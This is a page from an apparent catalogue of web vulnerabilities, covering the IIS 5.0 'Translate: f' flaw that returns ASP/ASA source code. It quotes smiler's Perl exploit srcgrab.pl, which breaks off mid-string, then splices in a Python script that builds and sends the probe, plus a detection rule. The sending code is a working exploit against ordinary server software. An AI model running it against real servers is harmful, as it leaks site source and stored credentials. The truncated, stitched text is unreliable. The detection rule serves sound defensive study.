CGI vulnerabilities (21)

(Tail of the file-check routine carried over from the preceding item; the function header is not on this page, so the signature and name below are reconstructed.)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Reconstructed header: returns 1 if the .htw file can be opened, 0 otherwise. */
int htw_file_exists(const char *pathtohtwfile)
{
    FILE *fd;
    char *file;
    file = (char *)malloc(250);
    if (file == NULL) { return 0; }
    strncpy(file, pathtohtwfile, 250);
    file[249] = '\0';          /* strncpy does not terminate a path that fills the buffer */
    fd = fopen(file, "r");
    free(file);
    // Success
    if (fd != NULL) { fclose(fd); return 1; }
    // failed
    else { return 0; }
}

36. Translate: f

WebDAV in Windows 2000 and Office 2000 (including FrontPage 2000 and the FrontPage 2000 Server Extensions) has a security problem known as Translate: f. When someone sends an HTTP GET request for an ASP/ASA file (or another script file) on the target machine that carries a "Translate: f" header, and a "/" is appended to the end of the URL, a Windows 2000 server that has not been patched (SP1 not applied; at the time of writing few servers had been patched) returns the source code of the ASP/ASA instead of the processed output it should return. smiler published a Perl exploit for this vulnerability:

-----------------------------start------------------------------------------------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG

if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl ))
Usage : srcgrab.pl
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl
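The request the item describes, as an added example in Python that is neither smiler's srcgrab.pl nor code from the original page: a builder for the Translate: f probe (GET, the header, the trailing "/"), a sender over a plain socket, and a detection rule for captured requests that flags the probe while leaving alone the legitimate Translate: f requests that Office 2000 Web Folders send for ordinary documents. The extension list in SCRIPT_EXTENSIONS, the host www.victimsite.com taken from the exploit's usage text, and the sample requests are constructed for the example.

```python
"""Translate: f source-disclosure probe and a matching detection rule.

Added example, not smiler's srcgrab.pl and not a Microsoft artefact.
Assumptions (not from the original text): header names are matched
case-insensitively, and the script extensions watched for are a chosen list.
"""
import socket
from urllib.parse import urlsplit

# Assumption: extensions whose source disclosure matters on an IIS 5.0 host.
SCRIPT_EXTENSIONS = (".asp", ".asa", ".inc")


def build_probe(url):
    """Raw HTTP/1.1 request for the Translate: f technique.

    The header asks the WebDAV handler for the unprocessed file; the trailing
    "/" keeps the request from being routed to the ASP script engine on an
    unpatched Windows 2000 / IIS 5.0 server, so the raw script comes back.
    """
    parts = urlsplit(url)
    path = parts.path or "/"
    if not path.endswith("/"):
        path += "/"
    host = parts.hostname or ""
    if parts.port:
        host = f"{host}:{parts.port}"
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Translate: f\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def send_probe(url, timeout=10.0):
    """Send the probe over a plain TCP socket and return the raw response bytes."""
    parts = urlsplit(url)
    with socket.create_connection((parts.hostname, parts.port or 80), timeout=timeout) as sock:
        sock.sendall(build_probe(url))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers); header names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_translate_f_probe(raw):
    """Detection rule: GET + "Translate: f" + a path of the form <script file>/."""
    method, target, headers = parse_request(raw)
    if method.upper() != "GET" or headers.get("translate", "").lower() != "f":
        return False
    path = target.split("?", 1)[0]      # ignore any query string after the slash
    if not path.endswith("/"):
        return False
    return path[:-1].lower().endswith(SCRIPT_EXTENSIONS)


# Constructed sample requests (not real captures).
SAMPLES = {
    "probe": build_probe("http://www.victimsite.com/global.asa"),
    # Office 2000 Web Folders send Translate: f for documents; that is legitimate WebDAV use.
    "office_webdav": (b"GET /docs/report.doc HTTP/1.1\r\nHost: www.victimsite.com\r\n"
                      b"Translate: f\r\n\r\n"),
    "plain_asp": b"GET /default.asp HTTP/1.1\r\nHost: www.victimsite.com\r\n\r\n",
}


def scan_samples():
    """Run the detection rule over the constructed samples: name -> flagged?"""
    return {name: is_translate_f_probe(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    print(build_probe("http://www.victimsite.com/global.asa").decode())
    print(scan_samples())
```

The rule keys on the combination the item describes (header plus the trailing slash on a script path) rather than on the header alone, because the header by itself is normal Office and FrontPage WebDAV traffic and would flood a detection pipeline with false positives.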